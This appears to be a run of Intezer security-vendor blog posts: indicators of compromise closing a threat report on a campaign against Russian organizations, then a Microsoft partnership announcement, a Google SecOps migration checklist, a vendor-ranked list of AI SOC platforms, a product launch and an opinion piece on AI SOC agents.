It’s less common to see public reporting on threats targeting Russian organizations, which makes this campaign worth highlighting. The threat actor appears to be actively exploring new methods to evade detection, including the use of XLL-based delivery techniques and newly developed payloads. These changes suggest an effort to enhance their capabilities. However, there are still clear gaps in both technical execution and linguistic accuracy, indicating that their tradecraft is still developing. 

IOCs

XLL Loader

0506a6fcee0d4bf731f1825484582180978995a8f9b84fc59b6e631f720915da

EchoGather Hashes and C2 Infrastructure

sha256C2 Address
c3e04bb4f4d51bb1ae8e67ce72aff1c3abeca84523ea7137379f06eb347e1669    https://ruzede[.]com/blogs/drafts/publish/schedule/seosso/login/mfa/verify/token/refresh/ips/blocklist/whitelist 
0d1dd7a62f3ea0d0fbeea905a48ae8794f49319ee0c34f15a3a871899404bf05
b2419afcfc24955b4439100706858d7e7fc9fdf8af0bb03b70e13d8eed52935c    https://fast-eda.my/dostavka/lavka/kategorii/zakuski/sushi/sety/skidki/regiony/msk/birylievo 
23d917781e288a6fa9a1296404682e6cf47f11f2a09b7e4f340501bf92d68514
dd5a16d0132eb38f64293b8419bab3a3a80f48dc050129a8752989539a5c97bf
74fab6adc77307ef9767e710d97c885352763e68518b2109d860bb45e9d0a8eb

Other Files

sha256File name (based on VirusTotal)
b6914d702969bc92e8716ece92287c0f52fc129c6fb4796676a738b103a6e039mswt.ps1
29101c580b33b77b51a6afe389955b151a4d0913716b253672cc0c0a41e5ccc8N/A
cdc3355ae57cc371c6c0918c0b5451b9298fc7d7c7035fa4b24d0cd08af4122cC:\Users\user\AppData\Roaming\Microsoft\Windows\docc1.ps1
dc2df351c306a314569b1eeaccf5046ce5a64df487fa51c907cb065e968bba80Вх.письмо_Мипромторг.lnk:.._.._.._.._.._Roaming_Microsoft_Windows_run.bat
76e4d344b3ec52d3f1a81de235022ad2b983eb868b001b93e56deee54ae593c5Вх.письмо_Мипромторг.rar
6a00b1ed5afcd63758b9be4bd1c870dbfe880a1a3d4e852bb05c92418d33e6dainvite.pdf
2abb9e7c155beaa3dcfa38682633dcbea42f07740385cac463e4ca5c6598b438(pdf document)

Explore which AI SOC platform is right for you.

The post Tracing a Paper Werewolf campaign through AI-generated decoys and Excel XLLs appeared first on Intezer.

  •  

Intezer named a top-tier Solutions Partner in the Microsoft AI Cloud partner program

Security teams that rely on Microsoft know the power of a deeply integrated security stack. Today, we’re proud to announce an important milestone that further strengthens that ecosystem.

Intezer has been named a top-tier Solutions Partner in the Microsoft AI Cloud Partner Program (MAICPP), a designation reserved for solutions that meet Microsoft’s highest standards for security, architecture, and seamless cloud integration.

This recognition follows a successful Microsoft technical audit and certifies the Intezer Forensic AI SOC platform as trusted, Microsoft-validated software designed to deliver real security outcomes for modern SOC teams.

Join AI SOC Live on January 6th to see how to maximize your Microsoft Security investment with  Forensic AI SOC. January 6th | 9am PT | 12pm EST.

Strengthening Microsoft-driven SOCs with Forensic AI

Microsoft security tools generate powerful signals, but signals alone don’t equal outcomes. SOC teams still face alert overload, limited context, and the constant risk that real threats hide in low- or medium-severity alerts.

The Intezer Forensic AI SOC platform was built to solve this problem.

Intezer strengthens the outcomes of Microsoft-driven SOCs by combining agentic AI with automated forensic investigation, enriching Microsoft alerts with deep technical evidence and cross-platform context. The platform investigates alerts from and across:

  • Microsoft Defender for Endpoint
  • Microsoft Defender for Identity (Entra ID)
  • Microsoft Defender for Office 365 and reported phishing
  • Microsoft Sentinel
  • Microsoft Defender for Cloud
  • Non-Microsoft security tools across endpoint, identity, cloud, email, and network environments

Instead of triaging only “high severity” alerts, Intezer investigates every alert with automated querying of Microsoft Sentinel, whenever needed, to enrich alerts, correlate logs, and validate activity. This provides visibility into every incident without manual lookups or switching tools.

How Intezer delivers better SOC outcomes on Microsoft

24/7 AI-powered triage and investigation

Intezer automatically triages and investigates 100% of alerts, including low- and medium-severity alerts that are commonly ignored. By mirroring how expert human analysts investigate incidents, using multiple AI models combined with deterministic forensics, Intezer delivers speed without sacrificing accuracy.

Less than 4% alerts escalated, higher confidence decisions

Across Microsoft and non-Microsoft alerts, fewer than 4% are escalated to human analysts. Each verdict is backed by forensic evidence, reducing noise, eliminating guesswork, and enabling analysts to focus only on what truly matters.

Faster response with native Microsoft actions

Intezer enables automated remediation directly through Microsoft tools, including:

  • Device isolation via Defender for Endpoint
  • User lockout through Entra ID
  • Email quarantine in Defender for Office 365
  • Interactive response via Microsoft Teams

This tight integration allows teams to move from alert to action in minutes, without switching tools or workflows.

Built to maximize the value of Microsoft security investments

“This designation reflects our commitment to helping organizations get the most out of their Microsoft security investments,” said Itai Tevet, CEO and co-founder of Intezer.
“As a top-tier Solutions Partner in the Microsoft AI Cloud Partner Program, we deliver AI-powered, forensic-grade investigations that strengthen the security outcomes of SOC teams using Defender, Sentinel, and the broader Microsoft Security Suite. We help teams move from alerts to clear, confident decisions in minutes.”

Intezer customers can also purchase directly through the Microsoft Azure Marketplace and apply existing Azure credits, simplifying procurement and accelerating time to value.

What the MAICPP designation means for security teams

The Microsoft AI Cloud Partner Program recognizes partners whose solutions are proven to work at scale across the Microsoft Cloud. Achieving top-tier Solutions Partner status signals that Intezer:

  • Meets Microsoft’s highest standards for security, reliability, and architectural excellence
  • Integrates deeply and natively across the Microsoft Security Suite
  • Delivers validated customer impact for organizations operating on Microsoft infrastructure

For customers, this designation provides confidence that Intezer is not just compatible with Microsoft security, but purpose-built to extend and elevate it.

Why this matters now

As SOCs face increasing alert volumes, tighter budgets, and a growing shortage of skilled analysts, automation alone is no longer enough. Security teams need forensic-grade AI that can explain why an alert matters, not just label it.

The MAICPP designation confirms that Intezer delivers exactly that:

  • Enterprise-grade accuracy
  • Microsoft-validated integrations
  • Proven SOC efficiency at scale

For organizations running on Microsoft, Intezer is now officially recognized as a trusted partner to help transform alerts into outcomes.

Learn more about Intezer Forensic AI SOC for Microsoft or get started today through the Azure Marketplace.

The post Intezer named a top-tier Solutions Partner in the Microsoft AI Cloud partner program appeared first on Intezer.

  •  

Comprehensive Google SecOps migration checklist for CISOs and SOC leaders

There’s a clear trend emerging with many organizations transitioning from legacy SIEMs to Google SecOps. While the Google SIEM platform is powerful, in our experience working with enterprise clients, that power only reveals itself when security leaders make three early decisions correctly:

  • Detection strategy: Whether to migrate existing rules or start fresh with a green-field approach.
  • Data onboarding: How to scale ingestion across multi-cloud environments without breaking pipelines.
  • Operating model: Building workflows that prevent “alert debt” from piling up on day one.

The strategic message is clear. Treat SIEM detection management with the same diligence you treat core security architecture, and augment your analysts with AI-powered triage so your humans can focus on higher-order investigations.

Here’s a practical checklist for discovery, migration, and operational success, designed for CISOs and SOC leaders evaluating a move to Google SecOps.

NOTE: This blog post is relevant to anyone considering a Chronicle SIEM migration as Google SecOps is the new Google branding for Chronicle.

The tl;dr version of the Google SIEM migration checklist 

PhaseKey focus
Pre-MigrationInventory, pain-point assessment, business justification
MigrationTool selection, data ingestion, rule/dashboard migration, Integration, governance & risk
Post-MigrationMeasurement of success, continuous improvement, cost optimisation, governance & reporting

Full Google SecOps migration checklist

Let’s dive into the details for each phase of the migration process.

Pre-migration checklist: Establishing the baseline

  1. Inventory current environment
    • Catalogue all data sources feeding Splunk: log types, volumes (GB/day), retention policies, on-prem vs cloud vs multi-cloud.
    • Map all current detections, dashboards, reports, playbooks, SOAR workflows.
    • Identify any compliance/regulatory retention obligations (audit logs, legal hold).
    • Establish current licensing costs, infrastructure (forwarders, indexers), staffing.
  2. Assess SIEM performance & pain points
    • Are you seeing cost escalation vs benefit (slower detection, high false positives, low automation)?
    • Is the SIEM struggling with data volume growth, scalability, multi-cloud telemetry?
    • Are SOC analysts spending more time on infrastructure/configuration than investigations?
    • Are you able to integrate newer requirements (cloud workloads, containers, IoT/OT, multi-cloud) effectively? This 451 Research report indicates many orgs run multiple SIEMs due to tool sprawl.
  3. Define business & security objectives
    • What do you hope to achieve? E.g., faster detection/response, lower cost, improved coverages, cloud alignment.
    • What are the key metrics: mean time to detect (MTTD), mean time to respond (MTTR), cost-per-alert, false positive rate, regulatory coverage, etc.
    • What is your target SOC maturity in e.g., 12-24 months? Are you planning a cloud-first strategy, heavier automation/AI, less on-prem infrastructure?
  4. Build the migration justification
    • Prepare a comparative TCO/ROI: legacy SIEM vs cloud-native. Google SecOps materials claim e.g., “ingest and analyse your data at Google speed and scale” and highlight cost benefit.
    • Understand what it will cost to migrate: re-write detections, dashboards, data flows, training, potential downtime.
    • Present risk assessment: What happens if you don’t migrate (risk of obsolete tool, scaling failure, cost spirals)? The “Great SIEM Migration” guide argues that legacy tools may become “dinosaurs”.

Migration-phase checklist: Executing the transition

  1. Select migration path & vendor/partner support
  2. Data ingestion, normalization & compatibility
    • Ensure: all of your log types/sources in Splunk are supported by the new platform. Google SecOps supports ingestion of Splunk CIM logs.
    • Plan for data mapping: Splunk field names, dashboards, custom fields → new schema.
    • Address historic data: Will you migrate archives? Will you keep Splunk as store-only? Community posts warn that mapping old archives can be complex.
    • Validate performance: test ingestion, query latency, retention policies on the new platform.
  3. Detection rules, dashboards, SOAR workflows
    • Catalogue existing detection rules, dashboards, SOAR playbooks in Splunk.
    • Determine which can be reused, which need rewriting. Ensure parity: detection coverage, mapping to MITRE ATT&CK, business use-cases. Splunk claims strong out-of-box detection library.
    • Build and test new rules/playbooks in Google SecOps; validate they meet or exceed current performance (MTTD, MTTR, false positives).
    • Ensure analyst training and new workflows are adopted: new UI, new query language, new incident-investigation flows (Google SecOps offers “Gemini in security operations” natural-language assistant).
  4. Integration & ecosystem fit
    • Ensure that Google SecOps integrates with your existing tool-stack (EDR, identity, network, cloud logs, SOAR, threat intel). Google advertises 300+ SOAR integrations.
    • Confirm multi-cloud/on-prem data ingestion: check vendor statements.
    • Validate APIs, custom connectors, forwarder architecture. Splunk vs Google SecOps comparison note: Splunk emphasizes hybrid flexibility.
  5. Governance, compliance & retention
    • Check how historic data will be retained, archived, accessed, both for compliance (audits/regulators) and investigations.
    • Confirm where the data resides (region/residency rules), encryption, access controls. Google SecOps claims to treat all data as first-party.
    • Align on SLAs, incident response metrics, roles & responsibilities.
    • Define cut-over strategy: Will Splunk be decommissioned or kept in read-only mode? Define freeze date, dual-runs, parallel operations.
  6. Risk management & business continuity
    • Define fallback/rollback plans: If the new platform fails, do you have the old SIEM in warm standby?
    • Monitor for data loss/misalignment during migration (NXLog warns of risks).
    • Communicate to stakeholders: SOC analysts, business units, auditors. Ensure training and change-management.
    • Set benchmarks and metrics: Time to detect/resolve in new platform vs old; cost per alert; staff utilisation; alert volumes; false positives.

Post-migration checklist: Optimizing & sustaining value

  1. Validate outcomes & measure success
    • Measure MTTD, MTTR, alert volumes, analyst productivity pre- and post-migration.
    • Compare actual cost savings vs business case.
    • Assess detection coverage: Are all critical use-cases still covered? Are any gaps emerging?
    • Run periodic health checks (some vendors like CardinalOps offer detection-rule health monitoring with MITRE ATT&CK coverage for Google SecOps).
  2. Continuous improvement & SOC maturity evolution
    • SOC maturity doesn’t stop at migration. Use freed-up resources to focus on advanced use-cases (threat hunting, proactive detection, automation, investigations).
    • Tune detection rules, remove noise, refine playbooks.
    • Leverage AI/natural-language features (Google SecOps touts “Gemini in security operations”).
    • Plan for future: hybrid/multi-cloud expansions, new telemetry sources, OT/IoT, supply-chain threats.
  3. Decommission legacy infrastructure & optimise cost
    • If the migration path included decommissioning the old SIEM (or reducing its role), ensure you turn off unneeded licences/infra.
    • Monitor the cost model of the new platform: ingestion volumes, retention policies—ensure you don’t inadvertently pay for excess.
    • Re-allocate resources: freed licences, server hardware, staff time — invest into SOC capability rather than maintenance.
  4. Governance, audit and stakeholder reporting
    • Update your SOC governance frameworks: incident-response playbooks, escalation paths, KPIs aligned with the new platform.
    • Communicate to board/executive leadership key outcomes: improved detection/response, cost rationalization, strategic alignment.
    • Ensure audit/compliance reports reflect the new tooling (document changes, validate controls).
    • Set up periodic reviews of tool performance, vendor roadmap, SOC maturity.

Final thoughts

Migrating to Google SecOps isn’t a simple platform swap, it’s a redesign of how your SOC operates. The upside: cost efficiency, scale, and automation can be immediate. The risks: migration complexity, content gaps, and operational disruption are real and must be managed deliberately.

As a CISO or SOC leader, treat this as a transformation program. Use the table and/or the full Checklist above to drive decisions; follow a strategic landing plan to sequence work; and anchor on the three non-negotiables outlined above:

  1. A clear detection strategy (migrate only if the value is there; rebuild the rest in YARA-L),
  2. Data onboarding at scale with a parser matrix and cost guardrails, and
  3. An operating model that prevents alert debt from day one through automation and measurable KPIs.

If you want help getting there faster, we can provide a SIEM jumpstart (curated + bespoke YARA-L rules, MITRE gap analysis and coverage, detection reviews, continuous improvement with Intezer engineers), a parser/ingestion plan for multi-cloud, and of course, Intezer Forensic AI SOC’s triage to meet on day-one, 100% alert coverage with full auditability so your analysts focus on the few cases that truly need their context and expertise.

Learn more about how Intezer can help you with your SecOps migration.

The post Comprehensive Google SecOps migration checklist for CISOs and SOC leaders appeared first on Intezer.

  •  

Top 15 AI SOC Tools for 2026: SOC Automation Compared

The Security Operations Center (SOC) has always been the heart of enterprise defense, but in 2026, it’s evolving faster than ever.

The rise of AI-driven SOC platforms, often referred to as Agentic AI SOCs, is redefining how enterprises detect, investigate, and respond to threats.

For years, security teams relied on a mix of SIEM, EDR, and MDR vendors to stay ahead of attacks. But these stacks often created their own problems: endless alert noise, long investigation times, and an overworked analyst team stuck in repetitive triage.

The new generation of AI SOC platforms changes that. They leverage large language models (LLMs), enabling SOCs to automatically triage and investigate every alert in minutes, not hours.

In this guide, we’ll break down the Top 15 AI SOC platforms to watch in 2026, ranked by how they balance speed, accuracy, explainability, and coverage across modern enterprise environments.

What is an Agentic AI SOC?

“Agentic” AI refers to systems that don’t just respond, they act. In cybersecurity, an Agentic AI SOC is capable of performing end-to-end investigations, drawing conclusions, and recommending (or executing) responses based on forensic evidence and reasoning.

These platforms are trained not only to summarize alerts but to understand their context, correlating data across endpoints, identities, networks, and cloud systems.

The best AI SOCs of 2026 are explainable, autonomous, and fast, providing the confidence enterprises need to trust machine-led decision-making.

Top AI SOC platforms in 2026 comparison table

PlatformBest forKey strength
Intezer (Forensic AI SOC)Large EnterprisesForensic-level, explainable investigations
7AIEnterprises exploring multi-agent automationMulti-agent orchestration
AiStrikeMid-market SOCsAffordable automated triage
SentinelOne (Purple AI)Enterprises using SentinelOne EDRIntegrated SOC automation
CrowdStrike (Charlotte AI)Falcon ecosystem usersGenerative AI for summaries
BlinkOpsSecurity automation teamsPlaybook-based automation
Bricklayer AIStartupsLightweight triage and reporting
Conifers.aiCloud-native companiesCloud-first visibility
Vectra AIMature SOCsNetwork threat detection
Dropzone AISOC automation innovatorsHuman-in-the-loop design
ExaforceMinimizing SIEM CostAlert routing and prioritization
Legion SecuritySOCs with expert analystsWorkflow management
Prophet.aiPredictive threat modelingProactive threat detection
Qevlar AILLM-driven SOCsAI triage experiments
Radiant SecurityMid-market enterprisesResponse recommendations

1. Intezer: Best AI SOC platform for enterprise SOCs

Best for: Large enterprises that prioritize speed, accuracy, and complete alert coverage.

Intezer Forensic AI SOC is built for enterprise and MSSPs, trusted by global brands including NVIDIA, Salesforce, MGM Resorts, Equifax, and Ferguson.
Intezer investigates 100% of alerts in under two minutes with 98% accuracy.

Unlike other platforms that rely solely on LLM-generated heuristics, Intezer fuses human-like reasoning with multiple AI models and deterministic forensic methods,  including code analysis, sandboxing, reverse engineering, and memory forensics.
The result is evidence-backed, explainable verdicts that eliminate the guesswork for SOC analysts.

For enterprises managing millions of alerts across SIEM, EDR, cloud, and identity systems, Intezer delivers full alert coverage and eliminates the low-severity blind spots that MDRs often ignore.

With endpoint-based pricing, Intezer removes the “alert tax” of data-ingest models and helps SOC leaders prove ROI to their boards, without expanding headcount.

Why enterprises choose Intezer

  • 100% alert investigation coverage across SIEM, EDR, phishing, identity, and cloud
  • Sub-2-minute investigations with 98% accuracy
  • Transparent, explainable verdicts
  • Trusted by Fortune 500 enterprises
  • Predictable ROI and cost efficiency

Experience Intezer in action with a custom demo.

Hear what CTO of MGM has to say about Intezer.

2. 7AI: Best for multi-agent SOC automation

7AI is one of the most experimental platforms in the 2026 AI SOC space. It focuses on multi-agent orchestration, where separate AI agents collaborate to triage, enrich, and investigate alerts across different domains.

Screenshot of 7AI product

While its architecture is impressive, 7AI is best suited for innovation-driven security teams that have strong engineering capacity and want to customize workflows. It performs well in large-scale EDR and cloud environments but requires fine-tuning for reliability.

Best for: Enterprises exploring multi-agent SOC architectures.

3. AiStrike: Best for mid-market SOCs

AiStrike targets the mid-market segment with a focus on cost-effective AI triage. It offers a simple, clean dashboard that connects with EDR and SIEM tools to automatically prioritize alerts. While its forensic depth is limited compared to enterprise-grade solutions, AiStrike delivers solid speed and automation for smaller SOCs.

Aistrike dashboard

Best for: Mid-market SOCs that want affordable, plug-and-play AI investigations.

4. SentinelOne (Purple AI): Best for endpoint-centric SOCs

SentinelOne’s Purple AI brings native AI investigation and response into the SentinelOne platform. It’s tightly integrated with SentinelOne’s EDR and XDR stack, which makes it a strong option for organizations already using the SentinelOne’s stack.

SentinelOne Purple AI product image

While Purple AI provides quick, summarized threat analysis and remediation recommendations, it focuses heavily on endpoints rather than full enterprise coverage.

Best for: Enterprises deeply invested in SentinelOne’s ecosystem that want integrated AI triage.

5. CrowdStrike (Charlotte AI): Best for AI-driven summarization

CrowdStrike’s Charlotte AI is the generative assistant within the Falcon platform, built to help analysts ask natural-language questions and interpret alerts faster.

Crowdstrike Charlotte AI product image

While not a fully autonomous SOC, Charlotte AI improves analyst experience and productivity by summarizing incidents and surfacing relevant insights. It’s ideal for teams that want to augment analysts rather than automate full investigations.

Best for: Enterprises using the CrowdStrike Falcon suite that want faster analyst assistance.

6. BlinkOps: Best for automation engineers

BlinkOps focuses on workflow automation, not investigations per se. It enables security teams to build playbooks and automation pipelines that connect multiple tools (SIEM, EDR, IAM, etc.).

BlinkOps prod image

While it doesn’t deliver forensic-level verdicts, BlinkOps is popular among DevSecOps teams that want custom automation flexibility.

Best for: Security engineers looking to automate existing SOC workflows.

7. Bricklayer AI: Best for startups and lean SOCs

Bricklayer AI provides lightweight alert triage and reporting capabilities. It’s built for smaller organizations that want to reduce alert fatigue without complex integrations. Its simplicity and affordability make it a solid entry point for teams without mature SOC processes.

Best for: Startups building early SOC capabilities on a budget.

8. Conifers.ai: Best for cloud-native companies

Conifers.ai specializes in cloud-first security visibility across AWS, Azure, and Google Cloud. Its AI models excel at correlating identity, network, and workload activity to flag potential breaches.

conifer.ai dashboard

It’s not a full SOC replacement, but it significantly enhances cloud investigation and response.

Best for: Cloud-first organizations seeking AI-enhanced detection and context.

9. Vectra AI: Best for network and identity threat detection

Vectra AI has long been a leader in AI-driven network detection and response (NDR). Its platform now extends into AI SOC territory, combining real-time detection with contextual identity analysis.

Vectra AI product image

Vectra is strong in hybrid environments but remains specialized in network telemetry rather than full-stack coverage.

Best for: Enterprises prioritizing network and identity visibility.

10. Dropzone AI: Best for SOC automation innovators

Dropzone AI represents the new wave of human-in-the-loop SOC automation. It allows analysts to supervise and approve actions initiated by AI, blending human expertise with autonomous investigation.

Dropzone.ai product image

While not as proven in large enterprises as Intezer, Dropzone’s agentic architecture makes it an intriguing option for forward-thinking SOCs.

Best for: SOCs experimenting with supervised AI autonomy.

Read about what CISOs are looking for in an AI SOC platform

11. Exaforce: Best for minimizing SIEM cost

Exaforce uses a multi-model AI engine to reduce alert overload, accelerate investigations, and expand detection coverage without relying on a traditional SIEM. Its AI stack, combining data-ingestion models, behavioral machine learning, and large language models, analyzes real-time telemetry while cutting SIEM-related storage and licensing costs.

Exaforce product image

The platform adapts quickly through feedback loops and natural-language business context, continuously refining accuracy and reducing false positives. With investigative graph visualizations and flexible deployment options, Exaforce helps streamline complex investigations.

Best for: Companies struggling with excessive SIEM spend.

12. Legion Security: Best for companies with expert human analysts

Legion automates SOC investigations by capturing and operationalizing real analyst decision-making. Its browser-based agent records every step of an analyst’s workflow such as data reviewed, actions taken, judgments made and then creating reusable investigative logic.

Legion Security product image

These recordings evolve into living agents that can be replayed, tested, refined, and re-executed across new alerts. Legion offers flexible deployment options including cloud, hybrid, or customer-hosted to support diverse security and compliance requirements. 

Best for: Organizations with expert human analysts, looking to create custom AI agents that can mirror their in-house best practices and knowledge. 

13. Prophet Security: Best for predictive SOCs

Prophet focuses on automated alert resolution using agentic reasoning that mirrors how experienced analysts assess user behavior, asset context, and threat indicators. It enriches alerts with data from endpoints, cloud systems, identity platforms, and threat intelligence to deliver high-confidence dispositions without relying on static rules. The platform supports flexible automation, from fully automated closure of benign alerts to analyst-in-the-loop escalation, and includes a copilot-style natural language interface for deeper investigation and threat hunting. 

Best for: Enterprises investing in predictive threat modeling and trend forecasting.

14. Qevlar AI: Best for experimental SOCs

Qevlar is an AI-powered investigation co-pilot that enhances analyst workflows by replicating the reasoning and research steps of human investigators. It ingests alerts from various tools and produces structured, evidence-backed reports with clear verdicts, confidence levels, and referenced data sources. Instead of suppressing or prioritizing alerts, Qevlar enriches and interprets them while preserving full analyst oversight. It also offers an automated documentation engine and support for on-prem deployment.

Best for: SOCs experimenting with AI-based triage prototypes.

15. Radiant Security: Best for mid-market enterprises

Radiant Security positions itself as an AI SOC for the mid-market and differentiates itself with claims of adaptive AI that can learn how to handle never-seen-before alerts as well as a built-in, affordable logging solution leveraging customers’ own archive storage. 

Radiant Security log management

Best for: Mid-market companies looking to eliminate expensive SIEM costs. 

The future of Agentic AI SOCs

The next evolution of SOC automation goes beyond alert management. In 2026 and beyond, Agentic AI SOCs will not only investigate but also take verified actions, quarantining hosts, isolating sessions, and orchestrating containment based on evidence and policy.

This shift demands trust, explainability, and speed. Enterprises can no longer afford “black-box” AI that delivers vague suggestions. They need platforms capable of forensic reasoning, auditability, and full coverage, exactly what Intezer Forensic AI SOC delivers.

SOC leaders who adopt these systems early will gain measurable efficiency, lower operational risk, and stronger security posture, without expanding headcount.

Final thoughts

AI SOC platforms are transforming how enterprises defend against modern threats.
While each platform on this list has unique strengths, Intezer stands out as the clear enterprise choice for those who demand accuracy, speed, and complete visibility.

See how Fortune 500 SOCs cut through the noise, reduce risk, and reclaim their time with Intezer. 

Book a demo to experience Intezer in action.

The post Top 15 AI SOC Tools for 2026: SOC Automation Compared appeared first on Intezer.

  •  

Introducing Intezer Forensic AI SOC

Modern SOC teams face some real challenges. They are drowning in alert volume, short on experienced analysts, and facing a new generation of AI-driven attacks that operate faster than humans can respond. This combination is eroding SOC effectiveness, slowing response times, and creating blind spots where real threats hide in low-severity alerts that teams no longer have the time or capacity to investigate.

To meet this moment, Intezer is proud to unveil Intezer Forensic AI SOC, the only AI SOC platform battle-tested inside some of the world’s most targeted and security-mature organizations. Already trusted by more than 150 enterprises, including 15 of the Fortune 500, the platform brings forensic-grade accuracy, full alert coverage, and sub-minute triage to modern security operations.

Why enterprises need a Forensic AI SOC

As attack surfaces grow, many organizations turn to MDR providers for 24/7 alert triage. But MDRs often operate as black boxes with inconsistent quality, high escalation rates, and limited visibility, leaving low-severity alerts unaddressed and creating gaps adversaries can exploit.

Most “AI SOC” tools depend entirely on AI agents for alert triage and investigation. This leads to surface-level results, slower performance, and higher compute usage, limiting their ability to process large alert volumes, especially low-severity signals where threats frequently hide.

The way forward requires an approach that removes SOC bottlenecks while delivering stronger, more reliable security outcomes. 

Why this matters now

The recent Anthropic AI espionage report marks a turning point. Threat actors are now weaponizing AI agents to automate full intrusion chains at machine speed.

These attacks often leave behind subtle, low-severity breadcrumbs that traditional SOCs and MDRs overlook. Without full alert coverage and forensic-grade triage, organizations cannot detect or contain AI-driven campaigns before they escalate.

This is precisely the gap Intezer’s Forensic AI SOC was built to close.

Watch session on how security leaders prepare for the new era of AI-orchestrated cyber attacks.

The Forensic AI SOC advantage

Intezer Forensic AI SOC flips the AI SOC model on its head. Instead of solely relying on AI Agents and LLMs, our platform combines AI agents and automated orchestration of  deterministic forensic tools, to mimic the triage and investigation methods used by elite responders and perform deep, accurate investigations at speed and scale.

Every alert is examined through a forensic lens using Intezer’s battle-tested capabilities, including endpoint forensics, reverse engineering, network artifact analysis, sandboxing, and other proprietary methods. These are paired with the adaptive research and reasoning of multiple LLMs to ensure both depth and flexibility in every investigation.

Intezer Forensic AI delivers:

  • 100% alert coverage, including low-severity alerts often ignored by SOCs and MDRs
  • Fewer than 4% of alerts escalated for human review
  • 98% accurate, consistent verdicts backed by deterministic evidence
  • 1-minute median triage time
  • Predictable, scalable pricing tied to endpoints, not alert volume or costly model usage

Enterprises get both the intelligence of AI and the rigor of forensics, without sacrificing speed, cost, or accuracy.

Proven in the world’s most targeted enterprises

Intezer supports over 150 enterprises, including 15 of the Fortune 500, across verticals such as finance, tech, pharma, critical infrastructure, hospitality and more. These organizations operate some of the most complex and heavily targeted environments in the world and rely on Intezer to keep their businesses secure. 

“Intezer’s AI-driven triage has been transformative for our SOC. It integrates seamlessly with our existing systems and delivers analyst-level investigations at scale, giving our team the confidence that every alert is handled with forensic accuracy.”

Branden Newman, CTO, MGM Resorts International

Built for the growing demands of enterprise SOCs

Enterprise SOCs must respond not only to rising alert volume, but also to increasing business pressure for speed, consistency, and measurable risk reduction. Companies using Intezer Forensic AI SOC enjoy:

  • Lower business risk
    Every alert, including low-severity signals used by modern attackers, is investigated with dramatically shortened MTTR.
  • Predictable, cost-efficient pricing
    Pricing aligned to endpoints avoids the unpredictable costs of LLM-heavy AI SOCs.
  • Instant time to value
    Hundreds of integrations enable rapid deployment and immediate time-to-value without training models on customer data.
  • Doing more with less
    Reduce MDR dependence and automate analyst workloads to optimize budgets and expand SOC output.

Built by security experts, for security experts

Intezer was founded and shaped by world-class SecOps leaders, security researchers and incident responders who have spent their careers defending some of the most targeted organizations and building foundational cybersecurity technologies.

Our leadership team includes pioneers who helped create and scale major cybersecurity companies. This firsthand experience responding to advanced threats, operating high-pressure SOC environments, and building products used by thousands of security teams worldwide directly informs how Intezer designs its technology.

We understand what analysts need, speed, accuracy, transparency, and trustworthy automation, because we’ve lived those challenges ourselves.

Intezer Forensic AI SOC reflects that operational DNA with a platform built not by generic AI engineers, but by practitioners who have spent years reverse engineering malware, hunting nation-state adversaries, leading global IR engagements, and building tools that analysts rely on every day.

Join the future of the SOC, today!

The SOC is entering a new era. Machine-scaled attacks demand an approach grounded in both forensic rigor and adaptive AI enabling consistent, accurate investigations to defend the enterprise. 

To explore how Intezer’s Forensic AI SOC can strengthen your operations, schedule a conversation with a product expert today!

The post Introducing Intezer Forensic AI SOC appeared first on Intezer.

  •  

Why the “AI SOC Agent” narrative misses the point: The future is about security outcomes, not workflow augmentation

tl;dr Greater productivity ≠ greater security outcomes. Kinda like why being able to accelerate from 0-60 MPH doesn’t help when the ice is cracking under your wheels.

And now, the full version.

AI SOC shouldn’t just “augment workflows”, that’s a productivity-locked perspective. The goal and the delivery capability that exists right now is to deliver full-scale enterprise triage of 100% of alerts with forensicly-accurate verdicts. That looks like streamlined triage, explainable verdicts, measurable accuracy, and operational resilience. There’s already an AI SOC platform that has operationalized what Gartner calls “emerging”.

While recent Gartner reports on “AI SOC Agents” and “SecOps Workflow Augmentation” succeed in elevating the conversation, they also reveal how incomplete that conversation still is. Both documents frame AI in the SOC as a promising but premature experiment, a toolset meant to make analysts more productive, not organizations more secure. That framing misses the point. AI isn’t about automation for automation’s sake; it’s about turning expert knowledge, data, context, and expertise into repeatable, scalable decision-making that covers every alert with confidence and context.

The bias in today’s AI SOC conversation

Gartner’s reports argue that AI SOC agents should be treated as “workflow augmentation tools” to reduce analyst fatigue and improve response efficiency. They recommend cautious adoption, structured pilots, and human-in-the-loop validation. Pragmatic? When LLMs are relied upon solely, sure. But the underlying assumption that enterprise-proven AI is not yet mature enough to deliver reliable outcomes is outdated.

In practice, this mindset anchors the market in productivity metrics, not security performance. It evaluates how efficiently teams work, not how effectively they defend. The focus stays on “mean time to detect” and “mean time to respond,” rather than the more critical questions:

  • Are ALL alerts being triaged?
  • Are verdicts, not just investigations, consistently accurate?
  • Are we actually reducing risk, not just improving the process?
  • Are alerts triaged in seconds & minutes for true containment & response?

That’s where the emerging class of true AI SOC platforms breaks away from the Gartner lens.

Workflow augmentation isn’t security

The distinction matters. Augmentation is an operational improvement; outcomes are a security transformation. Most vendors today build tools that accelerate investigation but still depend on human oversight for every meaningful decision. Those are SOAR 2.0 platforms: automation-centric, workflow-obsessed, and still fundamentally enrichment, not triage.

A true AI SOC, by contrast, triages every alert across the stack autonomously, determines a verdict with auditable reasoning, and escalates only when necessary, typically less than four percent of the time. This isn’t a co-pilot; it’s a teammate that already performs at the level of a seasoned analyst and identifies the needles without the haystack. This is incredible for the SOC analysts that are focused on looking at real alerts.

Security outcome execution is the critical requirement any true AI SOC should provide:

  • Resolve millions of alerts monthly across distributed environments with <4% escalation rates.
  • Deliver verdict accuracy above 97.7% through hybrid deterministic and AI reasoning.
  • Provide explainable decisions, validated by periodic human review and forensic evidence.
  • Uncover real threats in seconds & minutes, not hours.

This isn’t augmentation; it’s execution.

Read more about properly framing the AI SOC conversation.

The “emerging” technology that’s already operational

Gartner describes AI SOC agents as an “emerging technology” that promises to evolve beyond playbook-driven automation. The irony is that enterprise SOCs are already running on these systems today. Fortune 10 environments and thousands of organizations worldwide are triaging every single alert, not just the critical and high-severity ones, through AI that emulates human reasoning at scale.

These systems don’t “pilot” AI; they operationalize it. They deliver 24/7 SOC capability, instant triage, and consistent decision-making grounded in explainable logic, not black-box inference. They prove that an AI SOC is no longer a future-state concept. It’s production-grade infrastructure that’s rewriting what operational maturity means, and has been for years now.

The difference between Gartner’s caution and what’s happening in practice is simple: proof.

Measuring what actually matters

The reports fixate on efficiency → MTTD, MTTR, analyst satisfaction, but those metrics only tell half the story especially for antiquated SOCs. The next generation of AI SOCs defines success through security outcome metrics, including:

  1. Total alert coverage – Every alert analyzed, across all severities and sources.
